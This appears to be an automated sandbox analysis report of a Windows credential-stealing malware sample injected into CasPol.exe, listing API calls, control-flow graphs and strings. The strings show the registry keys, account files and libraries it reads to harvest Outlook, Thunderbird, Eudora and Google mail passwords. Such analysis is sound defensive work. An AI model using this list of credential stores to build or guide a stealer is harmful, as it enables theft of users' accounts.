                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                  • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 231171946-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1961120804-0
                                                                                                                                                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:22.9%
                                                                                                                                                                                  Signature Coverage:0.5%
                                                                                                                                                                                  Total number of Nodes:969
                                                                                                                                                                                  Total number of Limit Nodes:16
API calls 34284 443c71 44 API calls 34287 427c79 24 API calls 34462 416e7e memset __fprintf_l 34291 42800b 47 API calls 34292 425115 85 API calls __fprintf_l 34465 41960c 61 API calls 34293 43f40c 122 API calls __fprintf_l 34296 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34297 43f81a 20 API calls 34299 414c20 memset memset 34300 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34469 414625 18 API calls 34470 404225 modf 34471 403a26 strlen WriteFile 34473 40422a 12 API calls 34477 427632 memset memset memcpy 34478 40ca30 59 API calls 34479 404235 26 API calls 34301 42ec34 61 API calls __fprintf_l 34302 425115 76 API calls __fprintf_l 34480 425115 77 API calls __fprintf_l 34482 44223a 38 API calls 34308 43183c 112 API calls 34483 44b2c5 _onexit __dllonexit 34488 42a6d2 memcpy __allrem 34310 405cda 66 API calls 34496 43fedc 138 API calls 34497 4116e1 16 API calls __fprintf_l 34313 4244e6 19 API calls 34315 42e8e8 127 API calls __fprintf_l 34316 4118ee RtlLeaveCriticalSection 34502 43f6ec 22 API calls 34318 425115 119 API calls __fprintf_l 34319 410cf3 EnumResourceNamesA 34505 4492f0 memcpy memcpy 34507 43fafa 18 API calls 34509 4342f9 15 API calls __fprintf_l 34320 4144fd 19 API calls 34511 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34512 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34515 443a84 _mbscpy 34517 43f681 17 API calls 34323 404487 22 API calls 34519 415e8c 16 API calls __fprintf_l 34327 411893 RtlDeleteCriticalSection __fprintf_l 34328 41a492 42 API calls 34523 403e96 34 API calls 34524 410e98 memset SHGetPathFromIDList SendMessageA 34330 426741 109 API calls __fprintf_l 34331 4344a2 18 API calls 34332 4094a2 10 API calls 34527 4116a6 15 API calls __fprintf_l 34528 43f6a4 17 API calls 34529 440aa3 20 API calls 34531 427430 45 API calls 34335 4090b0 7 API calls 34336 4148b0 15 API calls 34338 4118b4 RtlEnterCriticalSection 34339 4014b7 CreateWindowExA 34340 40c8b8 19 API calls 
34342 4118bf RtlTryEnterCriticalSection 34536 42434a 18 API calls __fprintf_l 34538 405f53 12 API calls 34350 43f956 59 API calls 34352 40955a 17 API calls 34353 428561 36 API calls 34354 409164 7 API calls 34542 404366 19 API calls 34546 40176c ExitProcess 34549 410777 42 API calls 34359 40dd7b 51 API calls 34360 425d7c 16 API calls __fprintf_l 34551 43f6f0 25 API calls 34552 42db01 22 API calls 34361 412905 15 API calls __fprintf_l 34553 403b04 54 API calls 34554 405f04 SetDlgItemTextA GetDlgItemTextA 34555 44b301 ??3@YAXPAX 34558 4120ea 14 API calls 3 library calls 34559 40bb0a 8 API calls 34561 413f11 strcmp 34365 434110 17 API calls __fprintf_l 34368 425115 108 API calls __fprintf_l 34562 444b11 _onexit 34370 425115 76 API calls __fprintf_l 34373 429d19 10 API calls 34565 444b1f __dllonexit 34566 409f20 _strcmpi 34375 42b927 31 API calls 34569 433f26 19 API calls __fprintf_l 34570 44b323 FreeLibrary 34571 427f25 46 API calls 34572 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34573 43fb30 19 API calls 34382 414d36 16 API calls 34384 40ad38 7 API calls 34575 433b38 16 API calls __fprintf_l 34576 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34388 426741 21 API calls 34389 40c5c3 125 API calls 34391 43fdc5 17 API calls 34577 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34394 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 
33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 33217->33218 34582 43ffc8 18 API calls 34395 4281cc 15 API calls __fprintf_l 34584 4383cc 110 API calls __fprintf_l 34396 4275d3 41 API calls 34585 4153d3 22 API calls __fprintf_l 34397 444dd7 _XcptFilter 34590 4013de 15 API calls 34592 425115 111 API calls __fprintf_l 34593 43f7db 18 API calls 34596 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34399 4335ee 16 API calls __fprintf_l 34598 429fef 11 API calls 34400 444deb _exit _c_exit 34599 40bbf0 139 API calls 34403 425115 79 API calls __fprintf_l 34603 437ffa 22 API calls 34407 4021ff 14 API calls 34408 43f5fc 149 API calls 34604 40e381 9 API calls 34410 405983 40 API calls 34411 42b186 27 API calls __fprintf_l 34412 427d86 76 API calls 34413 403585 20 API calls 34415 42e58e 18 API calls __fprintf_l 34418 425115 75 API calls __fprintf_l 34420 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34608 434395 16 API calls 34422 441d9c memcmp 34610 43f79b 119 API calls 34423 40c599 43 API calls 34611 426741 87 API calls 34427 4401a6 21 API calls 34429 426da6 memcpy memset memset memcpy 34430 4335a5 15 API calls 34432 4299ab memset memset memcpy memset memset 34433 40b1ab 8 API calls 34616 425115 76 API calls __fprintf_l 34620 4113b2 18 API calls 2 library calls 34624 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 
33233->33236 33235->33228 33236->33233 34435 40b5bf memset memset _mbsicmp

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                  • memset.MSVCRT ref: 00408343
                                                                                                                                                                                  • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                  • memset.MSVCRT ref: 00408376
                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                  • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                  • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                                                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                  • String ID: ACD
                                                                                                                                                                                  • API String ID: 379999529-620537770
                                                                                                                                                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                  • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                  • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                  • memset.MSVCRT ref: 00402003
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • memset.MSVCRT ref: 00402086
                                                                                                                                                                                  • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                  • memset.MSVCRT ref: 00402018
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                  • API String ID: 52128907-4223776976
                                                                                                                                                                                  • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402869
                                                                                                                                                                                    • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                  • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                  • String ID: 2t

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
